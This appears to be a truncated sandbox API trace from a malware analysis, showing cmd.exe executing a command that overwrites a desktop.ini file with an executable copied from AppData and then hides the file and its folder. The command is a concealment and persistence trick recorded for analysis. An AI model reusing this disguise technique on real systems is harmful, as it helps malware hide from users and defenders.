SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0133.332] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.332] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0133.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.333] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.333] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.333] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.333] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.333] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.333] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0133.333] GetEnvironmentStringsW () returned 0x3c04e8* [0133.333] FreeEnvironmentStringsW (penv=0x3c04e8) returned 1 [0133.334] GetEnvironmentStringsW () returned 0x3c04e8* [0133.334] FreeEnvironmentStringsW (penv=0x3c04e8) returned 1 [0133.334] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eec0c | out: phkResult=0x2eec0c*=0x40) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x0, lpData=0x2eec18*=0x98, lpcbData=0x2eec10*=0x1000) returned 0x2 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x1, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x0, lpData=0x2eec18*=0x1, lpcbData=0x2eec10*=0x1000) returned 0x2 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x0, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x40, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x40, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x0, lpData=0x2eec18*=0x40, lpcbData=0x2eec10*=0x1000) returned 0x2 [0133.334] RegCloseKey (hKey=0x40) returned 0x0 [0133.334] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eec0c | out: phkResult=0x2eec0c*=0x40) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x0, lpData=0x2eec18*=0x40, lpcbData=0x2eec10*=0x1000) returned 0x2 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x1, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x0, lpData=0x2eec18*=0x1, lpcbData=0x2eec10*=0x1000) returned 0x2 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x0, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x9, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x4, lpData=0x2eec18*=0x9, lpcbData=0x2eec10*=0x4) returned 0x0 [0133.334] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eec14, lpData=0x2eec18, lpcbData=0x2eec10*=0x1000 | out: lpType=0x2eec14*=0x0, lpData=0x2eec18*=0x9, lpcbData=0x2eec10*=0x1000) returned 0x2 [0133.334] RegCloseKey (hKey=0x40) returned 0x0 [0133.334] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886367 [0133.334] srand (_Seed=0x5b886367) [0133.334] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"" [0133.334] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"" [0133.335] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.335] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c1c48, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0133.335] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.335] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.335] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.335] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0133.335] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0133.335] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0133.335] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0133.335] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0133.335] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0133.335] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0133.335] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0133.335] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0133.335] GetEnvironmentStringsW () returned 0x3c2638* [0133.335] FreeEnvironmentStringsW (penv=0x3c2638) returned 1 [0133.335] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.335] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.335] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0133.335] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0133.335] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0133.335] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0133.335] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0133.336] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0133.336] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0133.336] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0133.336] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef9d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.336] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef9d8, lpFilePart=0x2ef9d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef9d4*="Desktop") returned 0x18 [0133.336] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0133.336] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef754 | out: lpFindFileData=0x2ef754) returned 0x3c0cc8 [0133.336] FindClose (in: hFindFile=0x3c0cc8 | out: hFindFile=0x3c0cc8) returned 1 [0133.336] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef754 | out: lpFindFileData=0x2ef754) returned 0x3c0cc8 [0133.336] FindClose (in: hFindFile=0x3c0cc8 | out: hFindFile=0x3c0cc8) returned 1 [0133.336] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef754 | out: lpFindFileData=0x2ef754) returned 0x3c0cc8 [0133.336] FindClose (in: hFindFile=0x3c0cc8 | out: hFindFile=0x3c0cc8) returned 1 [0133.336] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0133.336] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0133.336] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0133.336] GetEnvironmentStringsW () returned 0x3c04e8* [0133.337] FreeEnvironmentStringsW (penv=0x3c04e8) returned 1 [0133.337] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.337] GetConsoleOutputCP () returned 0x1b5 [0133.337] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.337] GetUserDefaultLCID () returned 0x409 [0133.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efb18, cchData=128 | out: lpLCData="0") returned 2 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efb18, cchData=128 | out: lpLCData="0") returned 2 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efb18, cchData=128 | out: lpLCData="1") returned 2 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0133.338] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0133.338] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0133.339] GetConsoleTitleW (in: lpConsoleTitle=0x3b0af8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.339] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0133.339] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0133.339] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0133.339] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0133.340] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0133.340] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0133.340] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0133.340] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0133.340] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0133.340] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0133.340] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0133.342] _wcsicmp (_String1="del", _String2=")") returned 59 [0133.342] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0133.342] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0133.342] _wcsicmp (_String1="IF", _String2="del") returned 5 [0133.342] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0133.343] _wcsicmp (_String1="REM", _String2="del") returned 14 [0133.343] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0133.344] _wcsicmp (_String1="type", _String2=")") returned 75 [0133.345] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0133.345] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0133.345] _wcsicmp (_String1="IF", _String2="type") returned -11 [0133.345] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0133.345] _wcsicmp (_String1="REM", _String2="type") returned -2 [0133.345] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0133.459] SetErrorMode (uMode=0x0) returned 0x0 [0133.459] SetErrorMode (uMode=0x1) returned 0x0 [0133.459] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3c04f0, lpFilePart=0x2ef2cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef2cc*="Desktop") returned 0x18 [0133.459] SetErrorMode (uMode=0x0) returned 0x1 [0133.459] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.459] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.464] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.464] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2ef048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef048) returned 0xffffffff [0133.464] GetLastError () returned 0x2 [0133.464] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2ef048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef048) returned 0xffffffff [0133.465] GetLastError () returned 0x2 [0133.465] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2ef048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef048) returned 0x3c25d8 [0133.465] FindClose (in: hFindFile=0x3c25d8 | out: hFindFile=0x3c25d8) returned 1 [0133.465] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2ef048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef048) returned 0xffffffff [0133.465] GetLastError () returned 0x2 [0133.465] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ef048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef048) returned 0x3c25d8 [0133.465] FindClose (in: hFindFile=0x3c25d8 | out: hFindFile=0x3c25d8) returned 1 [0133.465] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.465] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.465] GetConsoleTitleW (in: lpConsoleTitle=0x2ef540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.465] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef3c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef490 | out: lpAttributeList=0x2ef3c8, lpSize=0x2ef490) returned 1 [0133.465] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef3c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef488, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef3c8, lpPreviousValue=0x0) returned 1 [0133.465] GetStartupInfoW (in: lpStartupInfo=0x2ef384 | out: lpStartupInfo=0x2ef384*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0133.466] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.466] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef424*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef470 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" ", lpProcessInformation=0x2ef470*(hProcess=0x50, hThread=0x4c, dwProcessId=0xba4, dwThreadId=0xb60)) returned 1 [0133.565] CloseHandle (hObject=0x4c) returned 1 [0133.565] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.565] GetEnvironmentStringsW () returned 0x3c0a18* [0133.565] FreeEnvironmentStringsW (penv=0x3c0a18) returned 1 [0133.565] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0133.635] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef364 | out: lpExitCode=0x2ef364*=0x0) returned 1 [0133.635] CloseHandle (hObject=0x50) returned 1 [0133.635] _vsnwprintf (in: _Buffer=0x2ef4ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef370 | out: _Buffer="00000000") returned 8 [0133.635] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0133.636] GetEnvironmentStringsW () returned 0x3c2628* [0133.636] FreeEnvironmentStringsW (penv=0x3c2628) returned 1 [0133.636] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.636] GetEnvironmentStringsW () returned 0x3c2628* [0133.636] FreeEnvironmentStringsW (penv=0x3c2628) returned 1 [0133.636] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef3c8 | out: lpAttributeList=0x2ef3c8) [0133.636] GetConsoleTitleW (in: lpConsoleTitle=0x2ef748, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.636] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ee7c0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ee7c4, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ee7c0*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0133.637] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0133.637] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0133.637] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0133.637] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\desktop.ini")) returned 0xffffffff [0133.637] GetLastError () returned 0x2 [0133.637] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd")) returned 0x10 [0133.637] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0133.637] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0133.637] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\desktop.ini")) returned 0xffffffff [0133.637] GetLastError () returned 0x2 [0133.637] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x3c36b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c36b4) returned 0xffffffff [0133.638] GetLastError () returned 0x2 [0133.638] _get_osfhandle (_FileHandle=2) returned 0xb [0133.638] GetFileType (hFile=0xb) returned 0x2 [0133.638] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0133.638] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2ef1c0 | out: lpMode=0x2ef1c0) returned 1 [0133.638] _get_osfhandle (_FileHandle=2) returned 0xb [0133.638] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2ef1f4 | out: lpConsoleScreenBufferInfo=0x2ef1f4) returned 1 [0133.638] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0133.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.639] GetFileType (hFile=0x7) returned 0x2 [0133.639] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0133.639] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef8e4 | out: lpMode=0x2ef8e4) returned 1 [0133.639] _dup (_FileHandle=1) returned 3 [0133.640] _close (_FileHandle=1) returned 0 [0133.640] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini", _String2="con") returned -53 [0133.640] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef8b4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0133.640] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0133.640] GetConsoleTitleW (in: lpConsoleTitle=0x2ef6e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.640] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2ef248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef248) returned 0x3be6b8 [0133.641] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0133.641] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0133.641] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0133.641] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ee154, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0133.641] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0133.641] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.641] GetFileType (hFile=0x58) returned 0x1 [0133.641] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.641] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x2ee1ac | out: lpFileSizeHigh=0x2ee1ac*=0x0) returned 0x7d600 [0133.641] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.641] SetFilePointer (in: 